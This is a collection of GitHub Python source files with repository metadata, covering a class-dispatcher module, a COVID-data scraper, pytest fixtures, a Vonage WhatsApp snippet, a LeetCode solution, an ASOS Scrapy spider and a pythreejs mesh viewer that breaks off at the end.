**{**self._attrs, **attrs},\n        )\n\n    def __get__(self, instance, owner):\n        \"\"\"Class dispatcher retrieval\n\n        The returned class depends on the setup of the `ClassDispatcher`.\n\n        If called on an instance, it will return a class ``self._get.instance``\n        class object.\n\n        If called on a class (type), it will return a class ``self._get.type``.\n\n        If the returned class is None, it will return ``self``.\n        \"\"\"\n        if instance is None:\n            inst = owner\n            cls = self._get.type\n        else:\n            cls = self._get.instance\n            if issubclass(cls, TypeDispatcher):\n                inst = owner\n            else:\n                inst = instance\n        _log.debug(\n            f\"__get__ {self.__class__.__name__},instance={instance!r},inst={inst!r},owner={owner!r},cls={cls!r}\",\n            extra={\"obj\": self},\n        )\n        if cls is None:\n            return self\n        return cls(\n            inst,\n            self._dispatchs,\n            default=self._default,\n            cls_attr_name=self._attr_name,\n            obj_getattr=self._obj_getattr,\n            **self._attrs,\n        )\n\n\n'''\nFor use when doing cached dispatchers\nclass CachedClassDispatcher(ClassDispatcher):\n\n    def __init__(self, name, dispatchs=None, default=None, obj_getattr=None, **attrs):\n        # obj_getattr is necessary for the ObjectDispatcher to create the correct\n        # MethodDispatcher\n        super().__init__(dispatchs, default, **attrs)\n        self._obj_getattr = _parse_obj_getattr(obj_getattr)\n        # the 
name of the ClassDispatcher attribute in the class\n        self._attr_name = name\n\n    def __get__(self, instance, owner):\n        \"\"\" Class dispatcher retrieval\n\n        When directly retrieved from the class we return it-self to\n        allow interaction with the dispatcher.\n\n        When retrieved from an object it returns an `ObjectDispatcher`\n        which contains the current dispatchs allowed to be dispatched through.\n        \"\"\"\n        if instance is None:\n            return self\n        dispatcher = ObjectDispatcher(instance, self._dispatchs,\n                                      default=self._default,\n                                      cls_attr_name=self._attr_name,\n                                      obj_getattr=self._obj_getattr,\n                                      **self._attrs)\n        object.__setattr__(instance, self._attr_name, dispatcher)\n        return dispatcher\n'''\n", "repo_name": "zerothi/sisl", "sub_path": "src/sisl/_dispatcher.py", "file_name": "_dispatcher.py", "file_ext": "py", "file_size_in_byte": 24590, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 155, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 43, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 100, "usage_type": "name"}, {"api_name": "abc.ABCMeta", "line_number": 123, "usage_type": "name"}, {"api_name": "collections.ChainMap", "line_number": 133, "usage_type": "argument"}, {"api_name": "collections.ChainMap", "line_number": 134, "usage_type": "call"}, {"api_name": "functools.update_wrapper", "line_number": 244, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 578, "usage_type": "call"}]} +{"seq_id": "24161363705", "text": "import requests\r\nfrom datetime import datetime\r\n\r\ndef catch_data():\r\n    \"\"\"\r\n    Fetch the current real-time data and return lists of country, continent, confirmed, suspected, dead and healed cases\r\n    :return:\r\n    \"\"\"\r\n    url = 'https://api.inews.qq.com/newsqa/v1/automation/foreign/country/ranklist'\r\n    data = requests.post(url).json()['data']\r\n\r\n    date_list = list()  # date\r\n    name_list = list()  # country\r\n    continent_list = list()  # continent\r\n    confirm_list = list()  # confirmed\r\n    suspect_list = list()  # suspected\r\n    dead_list = list()  # dead\r\n    heal_list = list()  # healed\r\n\r\n    for item in data:\r\n        month, day = item['date'].split('.')\r\n        date_list.append(datetime.strptime('2020-%s-%s' % (month, day), '%Y-%m-%d'))\r\n        name_list.append(item['name'])\r\n        continent_list.append(item['continent'])\r\n        confirm_list.append(int(item['confirm']))\r\n        suspect_list.append(int(item['suspect']))\r\n        dead_list.append(int(item['dead']))\r\n        heal_list.append(int(item['heal']))\r\n\r\n    return date_list, name_list, continent_list, confirm_list, suspect_list, dead_list, heal_list\r\n\r\n\r\ndef save_csv():\r\n    \"\"\"\r\n    Save the data to a csv file\r\n    :return:\r\n    \"\"\"\r\n    date_list, name_list, continent_list, confirm_list, suspect_list, dead_list, heal_list = catch_data()\r\n    fw = open('2019-nCoV.csv', 'w', encoding='utf-8')\r\n    fw.write('date,name,continent,confirm,suspect,dead,heal\\n')\r\n\r\n    i = 0\r\n    while i < len(date_list):\r\n        date = str(date_list[i].strftime(\"%Y-%m-%d\"))\r\n        fw.write(date + ',' + str(name_list[i]) + ',' + str(continent_list[i]) + ',' + str(confirm_list[i]) + ',' + str(suspect_list[i]) + ',' + str(dead_list[i]) + ',' + str(heal_list[i]) + '\\n')\r\n        i = i + 1\r\n    else:\r\n        print(\"csv file written\")\r\n    fw.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n    save_csv()", "repo_name": "meteor1993/python-learning", "sub_path": "python-data-analysis/2019-nCoV-global/data_spider.py", "file_name": "data_spider.py", "file_ext": 
"py", "file_size_in_byte": 1861, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 87, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.post", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "16361595659", "text": "import os\nimport sys\n\nimport pytest\nfrom bs4 import BeautifulSoup\n\n\nsys.path.insert(0, os.path.abspath('.'))\nsys.path.append(os.path.join(os.path.abspath('.'), 'habrpars'))\n\n\n@pytest.fixture\ndef page():\n path = os.path.abspath('.')\n filename = os.path.join(path, 'habrpars', 'fixtures', 'page.html')\n return filename\n\n\n@pytest.fixture\ndef page_raw_content(page):\n with open(page, 'r', encoding='utf-8') as handler:\n html_content = handler.read()\n return html_content\n\n\n@pytest.fixture\ndef page_content(page_raw_content):\n soup = BeautifulSoup(page_raw_content, 'html.parser')\n return soup\n", "repo_name": "mitrofun/habrpars", "sub_path": "habrpars/tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 621, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}]} +{"seq_id": "19783792198", "text": "import os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\n\ndotenv_path = join(dirname(__file__), \"../../.env\")\nload_dotenv(dotenv_path)\n\nVONAGE_APPLICATION_ID = os.environ.get(\"VONAGE_APPLICATION_ID\")\nVONAGE_APPLICATION_PRIVATE_KEY_PATH = os.environ.get(\"VONAGE_APPLICATION_PRIVATE_KEY_PATH\")\n\nTO_NUMBER = os.environ.get(\"TO_NUMBER\")\nWHATSAPP_NUMBER = os.environ.get(\"WHATSAPP_NUMBER\")\n\nCATALOG_ID = os.environ.get('CATALOG_ID')\nPRODUCT_RETAILER_ID = os.environ.get('PRODUCT_RETAILER_ID')\n\nimport vonage\n\nclient = vonage.Client(\n application_id=VONAGE_APPLICATION_ID,\n private_key=VONAGE_APPLICATION_PRIVATE_KEY_PATH,\n)\n\nclient.messages.send_message(\n {\n 'to': TO_NUMBER,\n 'from': WHATSAPP_NUMBER,\n 'channel': 'whatsapp',\n 'message_type': 'custom',\n 'custom': {\n 'type': 'interactive',\n 'interactive': {\n 'type': 'product',\n 'body': {'text' 'Check out this cool product'},\n 'footer': {'text': 'Sale now 
on!'},\n 'action': {'catalog_id': CATALOG_ID, 'product_retailer_id': PRODUCT_RETAILER_ID},\n },\n },\n }\n)\n", "repo_name": "Vonage/vonage-python-code-snippets", "sub_path": "messages/whatsapp/send_product_message_single_item.py", "file_name": "send_product_message_single_item.py", "file_ext": "py", "file_size_in_byte": 1170, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "vonage.Client", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "44407360810", "text": "#Given a string, sort it in decreasing order based on the frequency of characters.\r\n#\r\n#Example 1:\r\n#\r\n#Input:\r\n#\"tree\"\r\n#\r\n#Output:\r\n#\"eert\"\r\n#\r\n#Explanation:\r\n#'e' appears twice while 'r' and 't' both appear once.\r\n#So 'e' must appear before both 'r' and 't'. 
Therefore \"eetr\" is also a valid answer.\r\n#Example 2:\r\n#\r\n#Input:\r\n#\"cccaaa\"\r\n#\r\n#Output:\r\n#\"cccaaa\"\r\n#\r\n#Explanation:\r\n#Both 'c' and 'a' appear three times, so \"aaaccc\" is also a valid answer.\r\n#Note that \"cacaca\" is incorrect, as the same characters must be together.\r\n#Example 3:\r\n#\r\n#Input:\r\n#\"Aabb\"\r\n#\r\n#Output:\r\n#\"bbAa\"\r\n#\r\n#Explanation:\r\n#\"bbaA\" is also a valid answer, but \"Aabb\" is incorrect.\r\n#Note that 'A' and 'a' are treated as two different characters.\r\n\r\nclass Solution(object):\r\n def frequencySort(self, s):\r\n from collections import Counter\r\n\r\n freq = Counter(s)\r\n pairs = [(count, c) for c, count in freq.items()]\r\n pairs.sort(reverse = True)\r\n\r\n result = []\r\n for count, c in pairs:\r\n result += [c] * count\r\n\r\n\r\n return( \"\".join(result))\r\n\r\n\r\n \r\n ", "repo_name": "nileshpaliwal/May-Leetcoding-Challenge-2020", "sub_path": "Sort Characters By Frequency.py", "file_name": "Sort Characters By Frequency.py", "file_ext": "py", "file_size_in_byte": 1098, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.Counter", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "73833926593", "text": "from scrapy import Spider, Request\nfrom asos.items import AsosItem\nimport re\nimport os.path\nimport urllib.request \n\n\nclass AsosSpider(Spider):\n\tname = 'asos_spider'\n\tallowed_urls = ['http://us.asos.com/women/']\n\tstart_urls = ['http://us.asos.com/women/dresses/cat/?cid=8799&nlid=ww|clothing|shop+by+product']\n\n\tdef parse(self, response):\n\t\t# Find the total number of pages in the result so that we can decide how many urls to scrape next\n\t\ttext = response.xpath('//p[@class=\"_2sxPqJf\"]/text()').extract_first()\n\t\tper_page, total1, total2 = map(lambda x: int(x), re.findall('\\d+', text))\n\t\tnumber_pages = round((total1*1000+total2)/per_page)\n\n\t\t# List comprehension to construct all the urls\n\t\tresult_urls = ['http://us.asos.com/women/dresses/cat/?cid=8799&nlid=ww|clothing|shop%20by%20product&page={}'.format(x) for x in range(1, number_pages)]\n\n\t\t# Yield the requests to different search result urls, \n\t\t# using parse_result_page function to parse the response.\n\t\tfor url in result_urls:\n\t\t\tyield Request(url=url, callback=self.parse_result_page)\n\n\n\tdef parse_result_page(self, response):\n\t\t# This fucntion parses the search result page.\n\t\t\n\t\tproducts = response.xpath('//a[@class=\"_3x-5VWa\"]')\n\t\t\n\t\tfor product in products:\n\t\t\tdetail_url = product.xpath('.//@href').extract_first() # We are looking for url of the detail page.\n\t\t\tprice = product.xpath('.//p/span[2]/text()').extract_first()\n\n\t\t# Yield the requests to the details pages, \n\t\t# using parse_detail_page function to parse the response.\n\t\t# carry the price down since price can't be scraped on item page\n\t\t\tyield Request(url=detail_url, meta={'price': price}, callback=self.parse_detail_page)\n\n\n\n\tdef parse_detail_page(self, response):\n\t\t# This fucntion parses the product detail page.\n\n\t\tproduct = response.xpath('//div[@class=\"product-hero\"]/h1/text()').extract_first()\n\t\tprice = response.meta['price']\n\t\tdescription = response.xpath('//div[@class=\"product-description\"]/span/ul/li/text()').extract()\n\t\tmaterial = response.xpath('//div[@class=\"about-me\"]/span//text()').extract()\n\t\tfront_img = 'https:'+ response.xpath('//img/@src')[7].extract()\t\t\t\t\t\t# 
front size image (already sized correctly)\n\t\tback_img = 'https:'+ response.xpath('//img/@src')[4].extract().split(\"?\")[0]\t\t# back side image (resized)\n\t\t\n\t\t# This is for extracting product image ################################\t\t\n\t\t\n\t\tfull_file_name_front = os.getcwd() + '/img_dress/' + re.split(\"\\/\", front_img)[-1] + '.jpg'\t\t# file path/name\n\t\turllib.request.urlretrieve(front_img, full_file_name_front)\t\t\t\t\t\t\t\t\t\t# download front img\n\t\t\n\t\tfull_file_name_back = os.getcwd() + '/img_dress/' + re.split(\"\\/\", back_img)[-1] + '.jpg'\t\t# file path/name\n\t\turllib.request.urlretrieve(back_img, full_file_name_back)\t\t\t\t\t\t\t\t\t\t# download back img\n\n\n\t\titem = AsosItem()\n\t\titem['product'] = product\n\t\titem['price'] = price\n\t\titem['description'] = description\n\t\titem['material'] = material\n\t\titem['front_img'] = front_img\n\t\titem['back_img'] = back_img\n\t\t\n\t\tyield item\n\n\n\n\n", "repo_name": "hlk217/capstone", "sub_path": "Final/WEB_SCRAP/asos/asos/spiders/asos_spider.py", "file_name": "asos_spider.py", "file_ext": "py", "file_size_in_byte": 2980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 8, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 16, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 25, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.getcwd", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "name"}, {"api_name": "re.split", "line_number": 56, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 57, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 57, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 57, "usage_type": "name"}, {"api_name": "os.path.getcwd", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "name"}, {"api_name": "re.split", "line_number": 59, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 60, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 60, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 60, "usage_type": "name"}, {"api_name": "asos.items.AsosItem", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "24161363705", "text": "import pythreejs\nimport ipywidgets\nimport ipywidgets.embed\n\nfrom vis.viewer_base import *\n\n# Threejs apparently only supports square textures, so we need to add padding to rectangular textures.\n# The input UVs are assumed to take values in [0, 1]^2 where (0, 0) and (1, 1) are the lower left and upper right\n# corner of the original rectangular texture. 
We then adjust these texture\n# coordinates to map to the padded, square texture.\nclass TextureMap:\n # \"uv\" should be a 2D numpy array of shape (#V, 2)\n # \"tex\" should be a 3D numpy array of shape (h, w, 4)\n def __init__(self, uv, tex, normalizeUV = False, powerOfTwo = False):\n self.uv = uv.copy()\n\n # Make the parametric domain stretch from (0, 0) to (1, 1)\n if (normalizeUV):\n self.uv -= np.min(self.uv, axis=0)\n dim = np.max(self.uv, axis=0)\n self.uv /= dim\n\n h, w = tex.shape[0:2]\n s = max(w, h)\n if (powerOfTwo): s = int(np.exp2(np.ceil(np.log2(s))))\n padded = np.pad(tex, [(s - h, 0), (0, s - w), (0, 0)], 'constant', constant_values=128) # pad top, right\n\n self.dataTex = pythreejs.DataTexture(data=padded, format='RGBAFormat', type='UnsignedByteType')\n self.dataTex.wrapS = 'ClampToEdgeWrapping'\n self.dataTex.magFilter = 'LinearFilter'\n self.dataTex.minFilter = 'LinearMipMapLinearFilter'\n self.dataTex.generateMipmaps = True\n self.dataTex.flipY = True\n\n self.uv *= np.array([float(w) / s, float(h) / s])\n\n# According to the documentation (and experience...) the use of textures and vertex colors\n# \"can't be easily changed at runtime (once the material is rendered at least once)\",\n# apparently because these options change the shader program that is generated for the material\n# (which happens only once, upon first render).\n# Therefore, we will need different materials for all the combinations of\n# settings used in our viewer. We do that here, on demand.\nclass MaterialLibrary:\n def __init__(self, isLineMesh, isPointCloud):\n self.materials = {}\n self.isLineMesh = isLineMesh\n self.isPointCloud = isPointCloud\n if (not isLineMesh and not isPointCloud):\n self.commonArgs = {'side': 'DoubleSide', 'polygonOffset': True, 'polygonOffsetFactor': 1, 'polygonOffsetUnits': 1}\n else:\n self.commonArgs = {}\n\n def material(self, useVertexColors, textureMapDataTex = None):\n name = self._mangledMaterialName(False, useVertexColors, textureMapDataTex)\n if name not in self.materials:\n if (self.isLineMesh):\n args = self._colorTexArgs(useVertexColors, textureMapDataTex, '#000000')\n self.materials[name] = pythreejs.LineBasicMaterial(**args, **self.commonArgs)\n elif (self.isPointCloud):\n args = self._colorTexArgs(useVertexColors, textureMapDataTex, '#000000')\n self.materials[name] = pythreejs.PointsMaterial(**args, **self.commonArgs, size=5, sizeAttenuation=False)\n else:\n args = self._colorTexArgs(useVertexColors, textureMapDataTex, '#D3D3D3') # \"light gray\"\n self.materials[name] = pythreejs.MeshLambertMaterial(**args, **self.commonArgs)\n return self.materials[name]\n\n def ghostMaterial(self, origMaterial, solidColor):\n name = self._mangledNameForMaterial(True, origMaterial)\n if name not in self.materials:\n args = {'transparent': True, 'opacity': 0.25}\n args.update(self._colorTexArgs(*self._extractMaterialDescriptors(origMaterial), solidColor))\n if (self.isLineMesh ): self.materials[name] = pythreejs. LineBasicMaterial(**args, **self.commonArgs)\n elif (self.isPointCloud): self.materials[name] = pythreejs. 
PointsMaterial(**args, **self.commonArgs, size=5, sizeAttenuation=False)\n else: self.materials[name] = pythreejs.MeshLambertMaterial(**args, **self.commonArgs)\n else:\n # Update the existing ghost material's color (if a solid color is used)\n useVertexColors, textureMapDataTex = self._extractMaterialDescriptors(origMaterial)\n if (useVertexColors == False) and (textureMapDataTex is None):\n self.materials[name].color = solidColor\n\n return self.materials[name]\n\n def freeMaterial(self, material):\n '''Release the specified material from the library, destroying its comm'''\n name = self._mangledNameForMaterial(False, material)\n if (name not in self.materials): raise Exception('Material to be freed is not found (is it a ghost?)')\n mat = self.materials.pop(name)\n mat.close()\n\n def _colorTexArgs(self, useVertexColors, textureMapDataTex, solidColor):\n args = {}\n if useVertexColors:\n args['vertexColors'] = 'VertexColors'\n if textureMapDataTex is not None:\n args['map'] = textureMapDataTex\n if (useVertexColors == False) and (textureMapDataTex is None):\n args['color'] = solidColor\n return args\n\n def _mangledMaterialName(self, isGhost, useVertexColors, textureMapDataTex):\n # Since texture map data is stored in the material, we need a separate\n # material for each distinct texture map.\n category = 'ghost' if isGhost else 'solid'\n return f'{category}_vc{useVertexColors}' if textureMapDataTex is None else f'solid_vc{useVertexColors}_tex{textureMapDataTex.model_id}'\n\n def _extractMaterialDescriptors(self, material):\n '''Get the (useVertexColors, textureMapDataTex) descriptors for a non-ghost material'''\n return (material.vertexColors == 'VertexColors',\n material.map if hasattr(material, 'map') else None)\n\n def _mangledNameForMaterial(self, isGhost, material):\n useVertexColors, textureMapDataTex = self._extractMaterialDescriptors(material)\n return self._mangledMaterialName(isGhost, useVertexColors, textureMapDataTex)\n\n def __del__(self):\n for k, mat in self.materials.items():\n mat.close()\n\n# I couldn't get an async/await solution to work (awaiting\n# an ipywidgdet event captured with an observe callback\n# based on https://github.com/jupyter-widgets/ipywidgets/blob/master/docs/source/examples/Widget%20Asynchronous.ipynb\n# just hangs), and\n# explicitly calling the kernel's event loop is unreliable messes up the cell\n# output/execution order. 
The following implementation based on jupyter_ui_poll\n# seems to work well.\nclass ScreenshotWriter():\n def __init__(self, widget):\n import ipywebrtc\n stream = ipywebrtc.WidgetStream(widget=widget)\n self.rec = ipywebrtc.ImageRecorder(format='png', stream=stream)\n self._i = 0\n\n def capture(self, path):\n from jupyter_ui_poll import ui_events\n import time\n self.rec.recording = False # shouldn't be necessary: attempt to unstick\n self.rec.image.value = b''\n self.rec.recording = True\n with ui_events() as poll:\n for i in range(20): # Wait for at most 2s for this screenshot before giving up.\n if self.rec.image.value: break\n poll(10)\n time.sleep(0.1)\n if self.rec.image.value:\n self.rec.save(path)\n self._i += 1\n\ndef htmlColor(color):\n if (isinstance(color, str)): return color\n return '#' + ''.join([f'{round(255 * c):02x}' for c in color])\n\n# superView allows this viewer to add geometry to an existing viewer.\nclass PythreejsViewerBase(ViewerBase):\n def __init__(self, obj, width=512, height=512, textureMap=None, scalarField=None, vectorField=None, superView=None, transparent=False):\n # Note: subclass's constructor should define\n # self.MeshConstructor and self.isLineMesh, which will\n # determine how the geometry is interpreted.\n if (not hasattr(self, \"isLineMesh\" )): self.isLineMesh = False\n if (not hasattr(self, \"isPointCloud\")): self.isPointCloud = False\n if (self.MeshConstructor is None):\n self.MeshConstructor = pythreejs.Mesh\n\n self.avoidRedrawFlicker = False\n\n self.objects = pythreejs.Group()\n self.meshes = pythreejs.Group()\n self.ghostMeshes = pythreejs.Group() # Translucent meshes kept around by preserveExisting\n self.ghostColor = '#FF0000'\n\n self.materialLibrary = MaterialLibrary(self.isLineMesh, self.isPointCloud)\n\n # Sometimes we do not use a particular attribute buffer, e.g. the index buffer when displaying\n # per-face scalar fields. But to avoid reallocating these buffers when\n # switching away from these cases, we need to preserve the buffers\n # that may have previously been allocated. 
This is done with the bufferAttributeStash.\n # A buffer attribute, if it exists, must always be attached to the\n # current BufferGeometry or in this stash (but not both!).\n self.bufferAttributeStash = {}\n\n self.currMesh = None # The main pythreejs mesh being viewed\n self.wireframeMesh = None # Wireframe for the main visualization mesh\n self.pointsMesh = None # Points for the main visualization mesh\n self.vectorFieldMesh = None\n\n self.cachedWireframeMaterial = None\n self.cachedPointsMaterial = None\n\n self.shouldShowWireframe = False\n self.scalarField = None\n self.vectorField = None\n\n self.superView = superView\n if (superView is None):\n self.objects.add([self.meshes, self.ghostMeshes])\n else:\n superView.objects.add([self.meshes, self.ghostMeshes])\n superView.subViews.append(self)\n self.subViews = []\n\n self._arrowMaterial = None # Will hold this viewer's instance of the special vector field shader (shared/overridden by superView)\n self._arrowSize = 60\n\n if (superView is None):\n # We must create the camera now (instead of later in `setCamera`) so\n # that we can attach orbit controls and create the scene\n self.cam = pythreejs.PerspectiveCamera(position=[0, 0, 5], up=[0, 1, 0], aspect=width / height)\n\n # Camera needs to be part of the scene because the scene light is its child\n # (so that it follows the camera).\n self.scene = pythreejs.Scene(children=[self.objects, self.cam, pythreejs.AmbientLight(intensity=0.5)])\n\n # Sane trackball controls.\n self.controls = pythreejs.TrackballControls(controlling=self.cam)\n self.controls.staticMoving = True\n self.controls.rotateSpeed = 2.0\n self.controls.zoomSpeed = 2.0\n self.controls.panSpeed = 1.0\n self.renderer = pythreejs.Renderer(camera=self.cam, scene=self.scene, controls=[self.controls], width=width, height=height)\n else:\n self.cam = superView.cam\n self.scene = superView.scene\n self.controls = superView.controls\n self.renderer = superView.renderer\n\n super().__init__(obj, width=width, height=height, textureMap=textureMap, scalarField=scalarField, vectorField=vectorField, transparent=transparent, isSubview=superView is not None)\n\n def setCamera(self, position, up, fovy, aspect, near, far):\n self.cam.position = position\n self.cam.up = up\n self.cam.fovy = fovy\n self.cam.aspect = aspect\n self.cam.near = near\n self.cam.far = far\n\n def setPointLight(self, color, position):\n self.light = pythreejs.PointLight(color=htmlColor(color), position=position)\n self.cam.children = [self.light]\n\n def makeTransparent(self, color=None):\n if color is not None:\n self.ghostColor = color\n self.currMesh.material = self.materialLibrary.ghostMaterial(self.currMesh.material, self.ghostColor)\n\n def makeOpaque(self, color=None):\n self.currMesh.material = self.materialLibrary.material(False)\n if (color is not None):\n self.currMesh.material.color = color\n\n def _setGeometryImpl(self, vertices, idxs, attrRaw, preserveExisting=False, updateModelMatrix=False, textureMap=None, scalarField=None, vectorField=None, transparent=False):\n \"\"\"\n Backend-specific parts of ViewerBase.setGeometry\n \"\"\"\n # Turn the current mesh into a ghost if preserveExisting\n if (preserveExisting and (self.currMesh is not None)):\n oldMesh = self.currMesh\n self.currMesh = None\n oldMesh.material = self.materialLibrary.ghostMaterial(oldMesh.material, self.ghostColor)\n self.meshes.remove(oldMesh)\n self.ghostMeshes.add(oldMesh)\n\n # Also convert the current vector field into a ghost (if one is displayed)\n if (self.vectorFieldMesh in 
self.meshes.children):\n oldVFMesh = self.vectorFieldMesh\n self.vectorFieldMesh = None\n oldVFMesh.material.transparent = True\n colors = oldVFMesh.geometry.attributes['arrowColor'].array\n colors[:, 3] = 0.25\n oldVFMesh.geometry.attributes['arrowColor'].array = colors\n self.meshes.remove(oldVFMesh)\n self.ghostMeshes.add(oldVFMesh)\n else:\n self.__cleanMeshes(self.ghostMeshes)\n\n useVertexColors = self.scalarField is not None\n material = self.materialLibrary.material(useVertexColors, None if textureMap is None else textureMap.dataTex)\n\n if transparent:\n material = self.materialLibrary.ghostMaterial(material, self.ghostColor)\n\n ########################################################################\n # Build or update mesh from the raw attributes.\n ########################################################################\n stashableKeys = ['index', 'color', 'uv']\n def allocateUpdateOrStashBufferAttribute(attr, key):\n # Verify invariant that attributes, if they exist, must either be\n # attached to the current geometry or in the stash (but not both)\n assert((key not in attr) or (key not in self.bufferAttributeStash))\n\n if key in attrRaw:\n if key in self.bufferAttributeStash:\n # Reuse the stashed index buffer\n attr[key] = self.bufferAttributeStash[key]\n self.bufferAttributeStash.pop(key)\n\n # Update existing attribute or allocate it for the first time\n val = attrRaw[key]\n if key == 'color': val = val[:, 0:3] # pythreejs only supports RGB color arrays, not RGBA\n if key in attr:\n attr[key].array = val\n else:\n attr[key] = pythreejs.BufferAttribute(val)\n else:\n if key in attr:\n # Stash the existing, unneeded attribute\n self.bufferAttributeStash[key] = attr[key]\n attr.pop(key)\n\n # Avoid flicker/partial redraws during updates (if the user has our pythreejs fork installed)\n if self.avoidRedrawFlicker and hasattr(self.renderer, 'pauseRendering'):\n self.renderer.pauseRendering()\n\n if (self.currMesh is None):\n attr = {}\n\n presentKeys = list(attrRaw.keys())\n for key in presentKeys:\n if key in stashableKeys:\n allocateUpdateOrStashBufferAttribute(attr, key)\n attrRaw.pop(key)\n attr.update({k: pythreejs.BufferAttribute(v) for k, v in attrRaw.items()})\n\n geom = pythreejs.BufferGeometry(attributes=attr)\n m = self.MeshConstructor(geometry=geom, material=material)\n self.currMesh = m\n self.meshes.add(m)\n else:\n # Update the current mesh...\n attr = self.currMesh.geometry.attributes.copy()\n attr['position'].array = attrRaw['position']\n if 'normal' in attr:\n attr['normal'].array = attrRaw['normal']\n\n for key in stashableKeys:\n allocateUpdateOrStashBufferAttribute(attr, key)\n\n self.currMesh.geometry.attributes = attr\n self.currMesh.material = material\n\n # If we reallocated the current mesh (preserveExisting), we need to point\n # the wireframe/points mesh at the new geometry.\n if self.wireframeMesh is not None:\n self.wireframeMesh.geometry = self.currMesh.geometry\n if self.pointsMesh is not None:\n self.pointsMesh.geometry = self.currMesh.geometry\n\n ########################################################################\n # Build/update the vector field mesh if requested (otherwise hide it).\n ########################################################################\n if (self.vectorField is not None):\n # Construct vector field from raw data array if necessary\n if (not isinstance(self.vectorField, VectorField)):\n self.vectorField = VectorField(self.mesh, self.vectorField)\n\n self.vectorField.validateSize(vertices.shape[0], idxs.shape[0])\n 
self.vectorFieldMesh = self.vectorField.getArrows(vertices, idxs, material=self.arrowMaterial, existingMesh=self.vectorFieldMesh)\n\n self.arrowMaterial = self.vectorFieldMesh.material\n self.arrowMaterial.updateUniforms(**self._arrowMaterialUniforms())\n self.controls.shaderMaterial = self.arrowMaterial\n if (self.vectorFieldMesh not in self.meshes.children):\n self.meshes.add(self.vectorFieldMesh)\n else:\n if (self.vectorFieldMesh in self.meshes.children):\n self.meshes.remove(self.vectorFieldMesh)\n\n if self.avoidRedrawFlicker:\n # The scene is now complete; reenable rendering and redraw immediatley.\n # This is allowed to fail in case the user doesn't have my pythreejs fork...\n try: self.renderer.resumeRendering()\n except: pass\n\n def _arrowMaterialUniforms(self):\n # When updating any uniforms of the arrow mterial we need to prevent\n # stale, unsynced `rendererWidth` and `targetDepth` from overwriting\n # the correct values in the frontend; recalculate fresh values here.\n return { 'arrowSizePx_x' : self.arrowSize,\n 'rendererWidth' : 